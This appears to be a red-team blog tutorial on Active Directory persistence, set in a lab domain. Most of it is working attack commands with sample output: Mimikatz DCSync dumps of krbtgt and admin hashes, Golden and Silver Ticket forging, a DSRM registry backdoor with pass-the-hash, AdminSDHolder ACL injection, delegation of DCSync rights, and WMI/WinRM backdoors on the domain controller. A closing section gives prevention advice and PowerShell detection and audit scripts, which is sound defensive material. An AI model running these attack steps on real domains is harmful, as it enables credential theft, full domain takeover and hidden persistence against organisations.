1. DCSync — Extracting the krbtgt Hash

The krbtgt account is the key to the kingdom. Its NTLM hash is used to encrypt and sign every Kerberos TGT issued in the domain. With it, you can forge TGTs for any user, with any group membership, with any lifetime — completely offline, without touching the DC again. DCSync is the cleanest way to get it.

# Extract the krbtgt hash via DCSync (requires DA or replication rights)
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\krbtgt" exit

# Key values to note from the output:
SAM Username         : krbtgt
Object Security ID   : S-1-5-21-719815819-3726368948-3917688648-502
Credentials:
  Hash NTLM          : 4e9a25a62b7b4c8c2b6e11f3a9d0e9a2

# Also grab the domain SID (needed for ticket forging):
PS C:\AD\Tools> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648

# Get the Administrator hash too while you're here
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\Administrator" exit

Save these values securely: krbtgt NTLM hash + domain SID. These two values together let you forge a Golden Ticket at any time in the future — even after all passwords are reset — as long as the krbtgt password hasn't been rotated twice.

2. Golden Ticket — Forging a Universal TGT

A Golden Ticket is a forged Kerberos TGT. Because TGTs are encrypted with the krbtgt hash, and you now have that hash, you can create a valid TGT for any user — including a non-existent user — with any group memberships, including Domain Admins and Enterprise Admins. The DC trusts it completely because the signature is valid.

What makes it "golden": Normal TGTs expire in 10 hours and can be renewed for up to 7 days. A forged Golden Ticket can be set to expire in 10 years. It also bypasses smartcard requirements and any account restrictions — the DC only checks the cryptographic signature, which is valid because you used the real krbtgt hash.

2.1 Forging and Injecting a Golden Ticket
# Forge a Golden Ticket for masaaki_admin (or any username — even fake ones)
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::golden /User:masaaki_admin /domain:masaaki-corp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /krbtgt:4e9a25a62b7b4c8c2b6e11f3a9d0e9a2 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

# Parameters explained:
# /User      — username in the ticket (can be anything, even fake)
# /domain    — FQDN of the domain
# /sid       — domain SID (without the last RID)
# /krbtgt    — the krbtgt NTLM hash
# /id        — RID of the user (500 = Administrator)
# /groups    — group RIDs (512=Domain Admins, 519=Enterprise Admins, 520=Group Policy Creator Owners)
# /ptt       — inject the ticket into the current session immediately
# /endin     — ticket validity in minutes (600 = 10 hours, normal value)
# /renewmax  — max renewal time in minutes

# Verify the ticket is loaded
PS C:\AD\Tools> klist

# Access any resource in the domain
PS C:\AD\Tools> dir \\masaaki-dc\C$
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\Administrator" exit

2.2 Saving the Ticket to File for Later Use
# Save the Golden Ticket to a .kirbi file instead of injecting immediately
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::golden /User:masaaki_admin /domain:masaaki-corp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /krbtgt:4e9a25a62b7b4c8c2b6e11f3a9d0e9a2 /ticket:golden.kirbi" exit

# Inject the saved ticket later
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::ptt golden.kirbi" exit

# Or use Rubeus to inject
C:\AD\Tools> .\Rubeus.exe ptt /ticket:golden.kirbi

3. Silver Ticket — Forging a Service Ticket

A Silver Ticket is a forged TGS (service ticket) for a specific service. Unlike a Golden Ticket it doesn't use the krbtgt hash — it uses the service account's NTLM hash. The key difference: Silver Tickets are not validated by the DC at all — the service itself decrypts the ticket with its own password hash and trusts it. This makes Silver Tickets stealthier: the ticket is forged offline, so there is no KDC interaction at any point.

CIFS / SMB

Forge a CIFS ticket for a server using the machine account hash. Grants file system access to the target without interacting with the DC.

HOST

Forge a HOST ticket for scheduled task access on a remote machine. Useful for persistence — create a scheduled task on any server.

LDAP

Forge an LDAP ticket for the DC's machine account. Grants DCSync rights without needing DA — useful for stealthy replication.

WSMAN / HTTP

Forge a WSMAN ticket for WinRM access. Grants PS Remoting access to a machine using the machine account hash.

# Forge a CIFS Silver Ticket for masaaki-dc using the DC machine account hash
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::golden /User:masaaki_admin /domain:masaaki-corp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:masaaki-dc.masaaki-corp.local /service:cifs /rc4:a8b2c1d3e4f5a6b7c8d9e0f1a2b3c4d5 /ptt" exit

# /target  — the machine the service runs on
# /service — the service type (cifs, host, http, ldap, wsman)
# /rc4     — machine account NTLM hash (from DCSync or sekurlsa::logonpasswords)
# /ptt     — inject immediately

# Verify access to the DC's file system (no DC interaction — pure Silver Ticket)
PS C:\AD\Tools> dir \\masaaki-dc\C$

4. DSRM Backdoor — Local Admin on the DC via Restore Mode

Every Domain Controller has a DSRM (Directory Services Restore Mode) administrator account — a local admin account used for AD recovery that exists entirely outside of domain authentication. Its password is set during DC promotion and almost never changed. By dumping this hash and enabling DSRM logon over the network, you get a persistent local admin backdoor on every DC that survives domain-wide password resets.

4.1 Extracting the DSRM Hash
# Connect to the DC (requires DA access)
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc

# Dump the DSRM credentials from the DC's SAM database
PS [masaaki-dc]: C:\AD\Tools> .\Mimikatz.exe "token::elevate" "lsadump::sam" exit

# Look for the Administrator account in the output:
SAMKey : ...
User : Administrator
  Hash NTLM: f4c2b1a0d3e5f6a7b8c9d0e1f2a3b4c5  ← this is the DSRM hash

4.2 Enabling DSRM Network Logon (Persistence)

By default, the DSRM account can only log in when the DC is in restore mode. A registry change enables it for normal network logons too.

# On the DC — enable DSRM logon over the network
PS [masaaki-dc]: C:\AD\Tools> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Value 2 = DSRM account can log in at all times (not just during restore mode)
# This setting survives reboots and is NOT removed by domain password resets

# From your attack machine — Pass-the-Hash using the DSRM hash
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /domain:masaaki-dc /user:Administrator /ntlm:f4c2b1a0d3e5f6a7b8c9d0e1f2a3b4c5 /run:powershell.exe" exit

# Note: use the NetBIOS name (masaaki-dc), not the FQDN — DSRM is a local account

# Access the DC file system
PS C:\AD\Tools> dir \\masaaki-dc\C$

Why this is powerful: The DSRM password is almost never rotated. Even if the entire domain's passwords are reset (incident response scenario), the DSRM hash still works. This backdoor is extremely persistent and hard to detect — most organisations don't monitor DSRM account activity.

5. AdminSDHolder — Injecting Persistent ACEs on All Protected Objects

AdminSDHolder is an AD object at CN=AdminSDHolder,CN=System,DC=masaaki-corp,DC=local. Every hour, a background process called SDProp runs on the DC and copies the AdminSDHolder's ACL to all protected objects (Domain Admins, Enterprise Admins, Administrators, Schema Admins, etc.). By adding an ACE to AdminSDHolder, you ensure that ACE propagates to every privileged group in the domain within an hour — and re-applies every hour thereafter.

# Add GenericAll for masaaki on AdminSDHolder
# Within 60 minutes, masaaki gets GenericAll on all protected groups and users
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=masaaki-corp,DC=local" -PrincipalIdentity masaaki -Rights All -Verbose

# Trigger SDProp immediately (don't wait 60 minutes)
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

# Verify — masaaki now has GenericAll on Domain Admins
PS C:\AD\Tools> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReferenceName -match "masaaki"}

# Now use it — add masaaki to Domain Admins
PS C:\AD\Tools> Add-DomainGroupMember -Identity "Domain Admins" -Members masaaki -Verbose

Why this persists: Even if an admin notices and removes the ACE from Domain Admins, SDProp re-adds it from AdminSDHolder within 60 minutes. You need to remove the ACE from AdminSDHolder itself to stop the propagation. Most incident responders check the group's ACL, not AdminSDHolder.

6. DCSync Rights Delegation — Giving Any Account Replication Power

Grant a low-privilege user DCSync rights on the domain object. They can then dump any hash at any time, even without DA rights. Covered in detail in Blog 1 (WriteDACL abuse), but worth noting here as a persistence mechanism.

# Grant masaaki DCSync rights on the domain object
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity "DC=masaaki-corp,DC=local" -PrincipalIdentity masaaki -Rights DCSync -Verbose

# Later — masaaki can run DCSync without being in Domain Admins
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\krbtgt" exit

# Verify rights were granted
PS C:\AD\Tools> Get-DomainObjectAcl "DC=masaaki-corp,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -and ($_.IdentityReferenceName -match 'masaaki')}

7. Security Descriptor Persistence — WMI & PS Remoting Backdoors

Modify the security descriptors on WMI namespaces and PS Remoting (WinRM) on the DC to grant your low-priv account access. This means even if your DA is removed, you can still connect to the DC using a normal-looking domain user — no elevated privileges required.

7.1 PS Remoting Backdoor on the DC
# On the DC — grant masaaki PS Remoting access (no DA needed after this)
PS [masaaki-dc]: C:\AD\Tools> Set-RemotePSRemoting -UserName masaaki-corp\masaaki -ComputerName masaaki-dc -Verbose

# From your machine — masaaki can now PS Remote to the DC without DA
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc.masaaki-corp.local
PS [masaaki-dc]: C:\Users\masaaki> whoami
masaaki-corp\masaaki

7.2 WMI Backdoor — Remote Command Execution on the DC
# On the DC — modify WMI namespace security to grant masaaki access
PS [masaaki-dc]: C:\AD\Tools> . .\DAMP.ps1
PS [masaaki-dc]: C:\AD\Tools> Add-RemoteWMIAccess -UserName masaaki-corp\masaaki -ComputerName masaaki-dc -Verbose

# From your machine — masaaki can now execute commands on the DC via WMI
PS C:\AD\Tools> Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "cmd.exe /c whoami > C:\Temp\out.txt" -ComputerName masaaki-dc -Credential masaaki-corp\masaaki

# Retrieve the output
PS C:\AD\Tools> Get-Content \\masaaki-dc\C$\Temp\out.txt

Why these persist: WMI namespace ACLs and PS Remoting security descriptors are not reset when domain group memberships change. They live at the machine configuration level — not in AD. Only explicitly auditing and removing these ACL modifications will clean them up.

8. Prevention & Detection

Rotate krbtgt Password Twice

After any suspected compromise, rotate the krbtgt password twice with a 10-hour gap between rotations. This invalidates all existing Golden Tickets. A single rotation is not sufficient: the KDC keeps the previous krbtgt key and still accepts tickets encrypted with it, so the old hash remains usable for one ticket lifetime until the second rotation pushes it out.

Monitor DCSync Events

Alert on event 4662 from non-DC sources with replication object types. No user account should ever trigger a replication event — only other DCs should.
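The following is an added detection example, not part of the original page, covering the DCSync activity from sections 1 and 6. It pulls 4662 events from a DC, keeps only those whose Properties field carries a replication control-access GUID, and drops subjects that are DC machine accounts or on an allow-list. It assumes the ActiveDirectory module, read access to the DC's Security log, and an allow-list pattern (the directory-sync account names below are an assumption, edit them for your forest).

```powershell
# Added example (not from the original page). Replication control-access right GUIDs
# as they appear in the 4662 Properties field.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'    # DS-Replication-Get-Changes-In-Filtered-Set
)
# Non-DC accounts that legitimately replicate (assumption: adjust to your environment,
# e.g. an Entra/Azure AD Connect sync account). Everything else is reported.
$AllowedAccounts = @('MSOL_*', 'AADConnect*')

function Get-SuspiciousDcsyncEvents {
    param(
        [string]$DomainController = $env:COMPUTERNAME,
        [int]$Hours = 24
    )
    # DC machine accounts appear as NAME$ in SubjectUserName; they are expected to replicate.
    $dcAccounts = (Get-ADDomainController -Filter *).Name | ForEach-Object { "$_`$" }
    $filter = @{ LogName = 'Security'; Id = 4662; StartTime = (Get-Date).AddHours(-$Hours) }

    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten the EventData <Data Name="..."> elements into a hashtable.
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

            $hit = $ReplicationGuids | Where-Object { $d['Properties'] -match $_ }
            if (-not $hit) { return }                      # not a replication access
            $subject = $d['SubjectUserName']
            if ($dcAccounts -contains $subject) { return } # a DC replicating normally
            if ($AllowedAccounts | Where-Object { $subject -like $_ }) { return }

            [pscustomobject]@{
                Time    = $_.TimeCreated
                Subject = "$($d['SubjectDomainName'])\$subject"
                Object  = $d['ObjectName']
                Rights  = ($hit -join ',')
                LoggedOn = $_.MachineName
            }
        }
}

Get-SuspiciousDcsyncEvents -Hours 24 | Format-Table -AutoSize
```

Run it against each DC (or forward 4662 to a SIEM and apply the same GUID and subject filters there); a DC only logs 4662 for directory-access auditing when "Audit Directory Service Access" is enabled.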

Audit AdminSDHolder ACL

Include AdminSDHolder in regular ACL audits. Any non-default ACE here is a persistence mechanism. Run quarterly reviews or alert on 5136 (AD Object Modification) events targeting AdminSDHolder.

Monitor DSRM Registry Key

Alert if HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior is set to anything other than 0 on any DC. This should never change in normal operations.
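The following is an added audit example, not part of the original page, that checks the two persistence points from sections 4 and 5 at once: the DsrmAdminLogonBehavior value on every DC and ACEs on AdminSDHolder held by principals outside a stock baseline. It assumes the ActiveDirectory module (for the AD: drive and Get-ADDomainController) and WinRM access to the DCs; the baseline principal list is an assumption approximating a default forest and should be tuned to yours.

```powershell
# Added example (not from the original page).
# Principals that hold ACEs on AdminSDHolder in a stock domain (assumption: tune for your forest).
$DefaultAdminSDHolderPrincipals = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'NT AUTHORITY\Authenticated Users', 'Everyone',
    'BUILTIN\Administrators', 'BUILTIN\Pre-Windows 2000 Compatible Access',
    'BUILTIN\Windows Authorization Access Group', 'BUILTIN\Terminal Server License Servers',
    '*\Domain Admins', '*\Enterprise Admins', '*\Cert Publishers',
    '*\Key Admins', '*\Enterprise Key Admins'
)

function Get-AdminSDHolderNonDefaultAces {
    # Any ACE for a principal outside the baseline is a candidate SDProp persistence entry.
    $dn  = "CN=AdminSDHolder,CN=System,$((Get-ADDomain).DistinguishedName)"
    $acl = Get-Acl -Path "AD:\$dn"
    foreach ($ace in $acl.Access) {
        $who   = $ace.IdentityReference.Value
        $known = $DefaultAdminSDHolderPrincipals | Where-Object { $who -like $_ }
        if (-not $known) {
            [pscustomobject]@{
                Identity = $who
                Rights   = $ace.ActiveDirectoryRights
                Type     = $ace.AccessControlType
            }
        }
    }
}

function Get-DcsWithDsrmNetworkLogon {
    # The value does not exist by default; a missing value behaves as 0 (restore mode only),
    # so only DCs where it is present and non-zero are returned.
    $dcs = (Get-ADDomainController -Filter *).HostName
    Invoke-Command -ComputerName $dcs -ScriptBlock {
        $val = 0
        $v = Get-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' `
                              -Name DsrmAdminLogonBehavior -ErrorAction SilentlyContinue
        if ($null -ne $v) { $val = [int]$v.DsrmAdminLogonBehavior }
        [pscustomobject]@{ DC = $env:COMPUTERNAME; DsrmAdminLogonBehavior = $val }
    } | Where-Object { $_.DsrmAdminLogonBehavior -ne 0 }
}

Write-Host '== Non-default ACEs on AdminSDHolder =='
Get-AdminSDHolderNonDefaultAces | Format-Table -AutoSize
Write-Host '== DCs with DSRM network logon enabled =='
Get-DcsWithDsrmNetworkLogon | Format-Table -AutoSize
```

Schedule it alongside the quarterly ACL review and diff the output against the previous run so a newly added ACE or a flipped registry value stands out.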

Change DSRM Password Regularly

Rotate DSRM passwords on all DCs at least annually using ntdsutil set dsrm password. Include this in your DC maintenance runbook.

Detect Anomalous Kerberos Tickets

Alert on Kerberos tickets with lifetimes > 10 hours or SIDs that don't match existing accounts. Golden Tickets often use non-existent or renamed account SIDs that stand out in event logs.
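The following is an added detection example, not part of the original page, for the second indicator above: service-ticket requests (4769) whose client account does not exist in the directory, which is what a Golden Ticket forged for a fake or since-renamed user leaves on the DC. Ticket lifetime is not recorded in 4769, so that part of the check is out of scope here. It assumes the ActiveDirectory module and read access to the DC's Security log.

```powershell
# Added example (not from the original page).
function Get-TicketRequestsForUnknownAccounts {
    param(
        [string]$DomainController = $env:COMPUTERNAME,
        [int]$Hours = 24
    )
    $filter = @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddHours(-$Hours) }
    $seen = @{}   # sAMAccountName -> exists in AD (cache so each name is looked up once)

    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

            # TargetUserName is user@REALM (machine accounts appear as NAME$@REALM).
            $sam = ($d['TargetUserName'] -split '@')[0]
            if (-not $seen.ContainsKey($sam)) {
                # Strip LDAP filter metacharacters before building the lookup filter.
                $safe = $sam -replace '[()\\*]', ''
                $seen[$sam] = [bool](Get-ADObject -LDAPFilter "(sAMAccountName=$safe)")
            }
            if ($seen[$sam]) { return }   # account exists; nothing to report

            [pscustomobject]@{
                Time     = $_.TimeCreated
                Client   = $d['TargetUserName']
                Realm    = $d['TargetDomainName']
                Service  = $d['ServiceName']
                ClientIP = $d['IpAddress']
                EncType  = $d['TicketEncryptionType']
            }
        }
}

# Accounts from trusted domains also show up as unknown locally; filter on Realm when
# triaging if the forest has trusts.
Get-TicketRequestsForUnknownAccounts -Hours 24 | Format-Table -AutoSize
```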